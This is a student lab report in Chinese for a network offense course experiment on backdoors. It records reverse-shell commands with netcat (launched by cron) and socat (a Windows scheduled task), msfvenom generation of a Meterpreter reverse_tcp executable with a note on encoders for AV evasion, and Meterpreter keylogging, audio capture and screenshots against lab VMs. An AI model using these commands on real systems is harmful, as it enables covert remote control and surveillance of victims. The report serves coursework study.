20155330 《網絡對抗》 Exp2 後門原理與實踐

20155330 《網絡對抗》 實驗二 後門原理與實踐

基礎問題回答

1. 例舉你能想到的一個後門進入到你係統中的可能方式？

   在網站上下載非官方軟件，所下載的軟件中攜帶假裝過的後門程序。

2. 例舉你知道的後門如何啓動起來(win及linux)的方式？

   將後門程序假裝爲被啓動項目。

3. Meterpreter有哪些給你映像深入的功能？

   記錄音頻、獲取入侵主機權限。

4. 如何發現本身有系統有沒有被安裝後門？

   使用殺毒軟件進行查殺。

   實驗內容

5. 使用netcat獲取主機操做Shell，cron啓動
6. 使用socat獲取主機操做Shell, 任務計劃啓動
7. 使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

8. 使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

   經常使用後門工具

   準備工做

9. 打開cmd，輸入ipconfig獲取windows系統的IP地址和相關信息。
   • win10系統IP:192.168.43.248
     
   • win7系統IP:192.168.204.135
     

10. 打開終端，輸入ifconfig -a獲取Kali的IP地址和相關信息。

Win得到Linux Shell

如下實踐Windows基於Win10-64bit, Kali2-64bit.

1. windows 打開監聽

1. Linux反彈鏈接win

1. windows下得到一個linux shell，可運行任何指令，如ls

Linux得到Win Shell

如下實踐Windows基於Win7-64bit, Kali2-64bit.（後同）

1.Linux運行監聽指令

2.Windows反彈鏈接Linux

3.Linux下看到Windows的命令提示

nc傳輸數據

在win7的cmd中使用ncat.exe -l 5330監聽端口，Kali中使用nc win7主機IP 5330鏈接win7系統輸入數據，在win7同步顯示。

使用netcat獲取主機操做Shell，cron啓動

1. 在windows系統下監聽5330端口
   
2. 用crontab -e指令編輯一條定時任務（使用VIM編輯器編輯），在最後一行添加43 * * * * /bin/netcat 192.168.1.200 5215 -e /bin/sh（時間設置在Kali系統當前時間的後一分鐘）
   

3. 時間到43分時，windows系統得到Kali的shell，在cmd中輸入命令whoami獲得結果
   

   SoCat

4. 在Windows系統下，打開控制面板->管理工具->任務計劃程序，建立任務，填寫任務名稱後，新建一個觸發器
   
5. 在操做->程序/腳本中選擇socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:5330 exec:cmd.exe,pty,stderr（做用：把cmd.exe綁定到端口5215，同時將cmd.exe的stderr重定向到stdout）
   

6. 在Kali環境下輸入指令socat - tcp:192.168.204.135:5330，第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的5330端口，此時可成功得到cmd shell
   

   2.2 Meterpreter

生成20155330_backdoor.exe，複製到Win

1. 輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.204.135 LPORT=5330 -f exe > 20155330_backdoor.exe生成後門程序

1. 經過nc指令將生成的後門程序傳送到Windows主機上
   

• 參數說明：

  參數	相關說明
  -p	使用的payload。windows/meterpreter/reverse_tcp至關於shellcode。
  -x	使用的可執行文件模板，payload(shellcode)寫入到該可執行文件中。
  -e	使用的編碼器，用於對shellcode變形，爲了免殺。
  -i	編碼器的迭代次數。
  -b	badchar是payload中須要去除的字符。
  LHOST	是反彈回連的IP
  LPORT	是回連的端口
  -f	生成文件的類型
  >	輸出到哪一個文件

MSF打開監聽進程

1. 打開msfconsole
   
2. 輸入use exploit/multi/handler進行偵聽，並設置相關參數.
   
3. 設置完成後，執行監聽。Linux平臺的監聽進程將得到Win主機的主動鏈接，並獲得遠程控制shell
   

Meterpreter經常使用功能

1. 使用record_mic截獲一段音頻
   
2. 使用screenshot截屏
   
3. 使用keyscan_start指令記錄擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄
   
4. 使用getuid指令查看當前用戶
   

實驗體會

這次實驗首先要保證Kali和windows系統主機可以經過網絡相互鏈接，才能進行以後的步驟。實驗中主要遇到的問題就是電腦的攝像頭沒法鏈接到虛擬機，甚至在本機上也常常出現錯誤，應該是開學初的強制更新過程當中驅動出了問題。